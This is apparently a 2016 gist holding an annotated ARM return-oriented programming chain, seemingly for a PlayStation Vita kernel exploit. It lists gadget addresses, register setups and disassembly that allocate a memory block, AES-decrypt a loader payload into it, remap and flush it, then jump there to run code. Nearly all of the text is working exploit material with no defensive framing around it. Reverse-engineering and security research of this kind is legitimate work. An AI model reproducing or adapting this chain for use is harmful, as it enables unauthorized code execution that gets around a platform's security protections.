
@St4rk /rop Secret
Created Oct 21, 2016

00AC0031 start
ROM:00AC0030 POP {R0,PC}
08106803 r0
00ADeff1 pc
lsls r0, r0, #1
00000038 r3
00ADefe1 pc
MOV R1, R0 - type 0x1020D006
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADb571 pc
LSLS R2, R0, #5 - 0x41A00C0
ROM:00ADB572 BX LR
00000000 r3 - nullptr
00AC1e43 pc
ROM:00AC1E42 AND.W R2, R2, #0xF0000
ROM:00AC1E46 CMP.W R2, #0x40000
ROM:00AC1E4A BEQ loc_AC1E50
ROM:00AC1E4C MOVS R0, #0
ROM:00AC1E4E POP {R3-R5,PC}
00000000 r3 - nullptr
00ADfc6d r4
00ACea73 r5
00AC0031 pc
ROM:00AC0030 POP {R0,PC}
00AE7913 r0 - SceMagic
00ACa523 pc
r0 = name SceMagic
r1 = type 0x1020D006
r2 = size 0xA0000
r3 = nullptr
sceKernelAllocMemBlock(const char *name, SceKernelMemBlockType type, int size, SceKernelAllocMemBlockOpt *optp);
r0 = mem_id
00AC0347 r4
00AC0ce3 pc
ROM:00AC0CE2 POP {R4-R7,PC}
00AC0347 r4
00ADf2b1 r5
00AC0067 r6
00AC587f r7
00AD9713 pc
ROM:00AD9712 ADD R3, SP, #0x28 <- mem base
ROM:00AD9714 BLX R7
MOVS R2, R0
00AC1605 r4
00AC1e1d pc
ROM:00AC1E1C MOV R0, R3
ROM:00AC1E1E POP {R4,PC}
00000000 r4
00ADefe1 pc
MOV R1, R0
00AC0347 r3
00AC1603 pc -> set memid
ROM:00AC1602 MOV R0, R2
ROM:00AC1604 POP {R3,PC}
00ADf2b1 r3
r0 = memid
r1 = ptr_base
00AC1f17 pc sceKernelGetMemBlockBaseForKernel
00AC0347 r3 <- mem base ?
00AC0031 pc <- mem base ?
ROM:00AC0030 POP {R0,PC}
00ACb913 r0 <- mem base ?
00AE3b61 pc
MOVS R7, R0 ; membase ?
ROM:00AE3B66 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AE32eb pc
ROM:00AE32EA MOVS R0, #8 ; R0 = 8
ROM:00AE32EC BX LR
00AC0347 r3
00ADb571 pc
LSLS R2, R0, #5 ; R2 = 0x100
ROM:00ADB572 BX LR
00AE3b61 r3
00AE32f1 pc
ROM:00AE32F0 MOVS R0, #0x80 ; r0 = 0x80
ROM:00AE32F2 BX LR
00AC1411 r3
00AC0ae1 pc
MOVS R1, R0 ; r1 = 0x80 (block size ?)
ROM:00AC0AE2 BX LR
00AC0347 r3
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; r0 = membase ?
ROM:00AC50EA BLX R3
00AC1411 pc
ROM:00AC1410 POP {R4,R5,PC}
00000090 r4
00ADf2b1 r5
00AD2b11 pc
ROM:00AD2B10 ADDS.W R0, R0, R4,LSL#2 membase + 0x240
ROM:00AD2B14 BEQ loc_AD2ADE
ROM:00AD2B16
ROM:00AD2B16 loc_AD2B16
ROM:00AD2B16
ROM:00AD2B16 ADD SP, SP, #8
ROM:00AD2B18 POP {R4,PC}
00AC0ce3 sp+4
00AC00d1 sp+8
00AC0347 r4
00ADf2b1 pc
ROM:00ADF2B2 EOR R9, R0, #0x40 ; ctx
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADfdc5 pc
ROM:00ADFDC4 MOV R3, LR - key
ROM:00ADFDC6 BLX R4
r0 = ctx
r1 = block_size
r2 = keysize
r3 = key
00ADd8db - set aes key 0
00AD9399 r4
00AD9399 pc
; loop starts here
ROM:00AD9398 MOV R0, R9 ; r0 = ctx
ROM:00AD939A MOV R1, R4 ; r1 = 00AD9399
ROM:00AD939C LDR R2, [SP,#8] ; 00AD9399
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5 ; ctx >> 5
ROM:00ADF2B4 POP {R3,PC}
00AD1c5f r3
00AD9399 pc
ROM:00AD9398 MOV R0, R9 ; r0 = ctx
ROM:00AD939A MOV R1, R4 ; r1 = 00AD9399
ROM:00AD939C LDR R2, [SP,#8] ; 00AD9399
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5 ; ctx >> 5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00ACb913 pc
ROM:00ACB914 ADD R0, R4 ; r0 = r0 + 00AD9399
ROM:00ACB916 ADD R1, R2 ; r1 = r1 + 00AD9399
ROM:00ACB918 CMP R0, R1 ; compare
ROM:00ACB91A ITE HI
ROM:00ACB91C MOVHI R0, #0 ; r0 = 0 if (r0 > r1)
ROM:00ACB91E MOVLS R0, #1 ; r0 = 1 if (r0 <= r1), unsigned compare
ROM:00ACB920 ADD SP, SP, #8
ROM:00ACB922 POP {R4,PC}
00000000 sp+4
00ADefe1 sp+8
00AC0347 r4
00AC1861 pc
ROM:00AC1860 MOVS R0, #0 ; r0 = 0
ROM:00AC1862 POP {R3,PC}
00ADfc6d r3
00ADf2b1 pc
ROM:00ADF2B2 LSRS R0, R0, #5 ; r0 >> 5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AD9399 pc
ROM:00AD9398 MOV R0, R9 ; r0 = r9
ROM:00AD939A MOV R1, R4 ; r1 = 00AC0347
ROM:00AD939C LDR R2, [SP,#8] ; 00AD9399
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AD9399 pc
ROM:00AD9398 MOV R0, R9 ; r0 = r9
ROM:00AD939A MOV R1, R4 ; r1 = 00AD9399
ROM:00AD939C LDR R2, [SP,#8] ; r2 = 00AC39eb
ROM:00AD939E MOVS R3, #0 ; r3 = 0
ROM:00AD93A0 BLX R5
ROM:00ADF2B2 LSRS R0, R0, #5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AD614d pc
ROM:00AD614C ADDS R0, #0x10 ; next block
ROM:00AD614E BX LR
00AE33d3 r3
00Adf2b1 pc
ROM:00ADF2B2 LSRS R0, R0, #5 ; r0 >> 5
ROM:00ADF2B4 POP {R3,PC}
00AC0347 r3
00AC00af pc
ROM:00AC00AE NEGLS R0, R0 ; r0 = -r0
ROM:00AC00B0 BX LR
00AC1605 r3
00ADefe1 pc
0xADEFE1: MOVS r1, r0 ; r1 = r0
0xADEFE3: POP {r3, pc}
00AC0347 r3
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; r0 = membase ?
ROM:00AC50EA BLX R3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AC1347 pc
0xAC1347: movs r2, r0 ; r2 = membase ?
0xAC1349: bx lr
00AC0347 r3
00AC00b9 pc
ROM:00AC00B8 SUBS R0, R2, R1 ; r0 = membase - cnt
ROM:00AC00BA BX LR
00ADf2b1 r3
00AC1347 pc
0xAC1347: movs r2, r0 ; r2 = membase - cnt ?
0xAC1349: bx lr
00AC0347 r3
00AC039b pc
ROM:00AC039A POP {R4,PC}
DEADBEEF r4 -- loader addr
00ADcb95 pc
ROM:00ADCB94 SUBS R1, R4, R1 ; r1 = loader_addr - cnt
ROM:00ADCB96 BLX R3
00ADea93 pc
ROM:00ADEA92 MOV R0, R6 ; r0 = 00AC0067
ROM:00ADEA94 BLX R3
00AC1411 pc
00AC0347 r4
00AE09d7 r5
00AE09d3 pc
ROM:00AE09D2 STR R5, [SP,#0xC] ; r5 = 00AE09d7
ROM:00AE09D4 LDR R5, [SP,#0x38] ; 00AC652b ?
ROM:00AE09D6 STR R5, [SP,#0x10] ;
ROM:00AE09D8 BLX R4
00AC1411 pc
ROM:00AC1410 POP {R4,R5,PC}
00AC0347 r4
00ADbaf5 r5 - aes decrypt
00AC1605 pc - either 00AE09d7
ROM:00AC1604 POP {R3,PC}
00AC0347 r3 - either 00AC652b
00AC652b pc
ROM:00AC652A ADD SP, SP, #0xC
ROM:00AC652C POP {PC}
00AC0347 0x4
00ADbaf5 0x8 - aes decrypt
00AE2a49 0xC
00AE09d7 pc
ROM:00AE09D6 STR R5, [SP,#0x10]
ROM:00AE09D8 BLX R4
00AC039b pc
00000040 r4
00AE2a49 pc
ROM:00AE2A48 SUBS R0, R0, R4
ROM:00AE2A4A POP {R4,PC}
00AC0347 r4 ; either 00AC652b ?
00AC652b pc <- loop
ROM:00AC652A ADD SP, SP, #0xC
ROM:00AC652C POP {PC}
00AC0347 0x4
00AC039b 0x8
00000040 0xC
00AC1605 pc
ROM:00AC1604 POP {R3,PC}
00AC0347 r3
00ADd9eb pc
ROM:00ADD9EA ADD R2, SP, #0xBC
ROM:00ADD9EC BLX R3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AC0853 r3
00ADd8db -- aes init ?
ROM:00ADD8E6 POP {R4,PC}
00000038 r3
00AC00ab pc
ROM:00AC00AA SUBS R2, R2, R1
ROM:00AC00AC IT LS
ROM:00AC00AE NEGLS R0, R0
ROM:00AC00B0 BX LR
00AC00d1 r3
00AE328b pc
ROM:00AE3288 ORR.W R0, R2, #0x11
ROM:00AE328C POP {R4,PC}
00AE2fcd r3
00AC00d1 pc
ROM:00AC00CE SUB.W R0, R0, R12
ROM:00AC00D2 BX LR
00ADeff1 r3
00AEa117 pc
ROM:00AEA116 POP {R2,R5,PC}
00AC0347 r2
00AC1605 r5
00AD9399 pc
ROM:00AD9398 MOV R0, R9
ROM:00AD939A MOV R1, R4
ROM:00AD939C LDR R2, [SP,#8]
ROM:00AD939E MOVS R3, #0
ROM:00AD93A0 BLX R5
00AC0347 r3
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADbf1f
ROM:00ADBF1C LDR.W R0, [R0,R2,LSL#2]
ROM:00ADBF20 BX LR
fffffeb0 r3
00AC039b pc
ROM:00AC039A POP {R4,PC}
00000240 r4
00AE2a49 pc
ROM:00AE2A48 SUBS R0, R0, R4
ROM:00AE2A4A POP {R4,PC}
00AC39eb r4
00AC3d73 pc
ROM:00AC3D72 ITE NE
ROM:00AC3D74 MOVNE R0, R3
ROM:00AC3D76 MOVEQ R0, #0
ROM:00AC3D78 BX LR
00000000 r3
00AC21fd pc
ROM:00AC21FE CMP R3, #0
ROM:00AC2200 BNE loc_AC21E2
ROM:00AC2202
ROM:00AC2202 loc_AC2202 ; CODE XREF: sub_AC21C0+1Cj
ROM:00AC2202 ; sub_AC21C0+30j ...
ROM:00AC2202 POP {R4}
ROM:00AC2204 BX LR
00AC0347 r4
00AC50e9 r3
00AC0ae1 pc
ROM:00AC0ADE ORREQ.W R0, R0, #1
ROM:00AC0AE2 BX LR
00AC0347 r3
00AEa117 pc
ROM:00AEA116 POP {R2,R5,PC}
00AC0347 r2
00ADf2b1 r5
00AC0067 pc
; end of while probably
ROM:00AC0066 MOV SP, R1
ROM:00AC0068 BLX R2
ROM:00AC006A MOV SP, R4
ROM:00AC006C POP.W {R4-R12,PC}
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00ADbf47 pc
ROM:00ADBF46 MOVNE R1, #0 ; r1 = 0
ROM:00ADBF48 BX LR
00AC0347 r3
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; r0 = membase
ROM:00AC50EA BLX R3
00ACaf33 pc - something dealing with membase
00AC0347 r3
00ADd9eb r4
DEADBABE r5 - second_payload ; used as argument in the loader.enc
00ADfc6d pc
ROM:00ADFC6C BLX R3
ROM:00ADFC6E POP {R4,PC}
00ACea73 pc
movs r3, r0 ; return from
ROM:00ACEA74 BX LR
00AC039b r4
00AC0853 pc
ROM:00AC0852 POP {R0,R1,PC}
ROM:00AC039A POP {R4,PC}
ffffffff r0
08106803 r1 ; memory type
00AE33d3 pc
ROM:00AE33D3 lsls R2, R1, #1 memtype << 1
ROM:00AE33D4 BX LR
00AC0347 r4
00AC0433 pc
ROM:00AC0432 SUBS R1, R2, #1 memtype -= 1
ROM:00AC0434 ANDS R0, R1
ROM:00AC0436 BEQ loc_AC0440
ROM:00AC0438 CLZ.W R0, R0
ROM:00AC043C SUB.W R4, R3, R0,LSR#3
ROM:00AC0440
ROM:00AC0440 loc_AC0440
ROM:00AC0440 SUBS R0, R4, #1
ROM:00AC0442 POP {R4,PC}
00AE33d3 r4
00AD50a3 pc
ROM:00AD50A2 MOV R0, R3 ; mem id ?
ROM:00AD50A4 POP {R3,PC}
00000000 r3
r0 = memid
r1 = memtype
00ACa74d ;remap memblock ?
ROM:00ACA74C PUSH.W {R4-R10,LR}
ROM:00ACA750 MOV R6, #dword_AEA004
ROM:00ACA758 SUB SP, SP, #0x10
00AC0000 membase
00AC0853 pc
ROM:00AC0852 POP {R0,R1,PC}
00ADbf1f r0
ROM:00ADBF1C LDR.W R0, [R0,R2,LSL#2]
ROM:00ADBF20 BX LR
00000200 r1 ; size to flush cache
00AC1605 pc
ROM:00AC1604 POP {R3,PC}
00AC0347 r3
ROM:00AC0346 POP {PC}
00AC50e9 pc
ROM:00AC50E8 MOV R0, R7 ; mem id
ROM:00AC50EA BLX R3
00AC1605 pc
ROM:00AC1604 POP {R3,PC}
00AE2fcd r3 - flush cache
00AC39eb pc
ROM:00AC39EA BLX R3
ROM:00AC39EC POP {R3,PC}
00AC0853 r3
ROM:00AC0852 POP {R0,R1,PC}
00AD1c5f ; trigger payload code execution
ROM:00AD1C5C ADDS R4, #1 ;
ROM:00AD1C5E BLX R7 ; jump to membase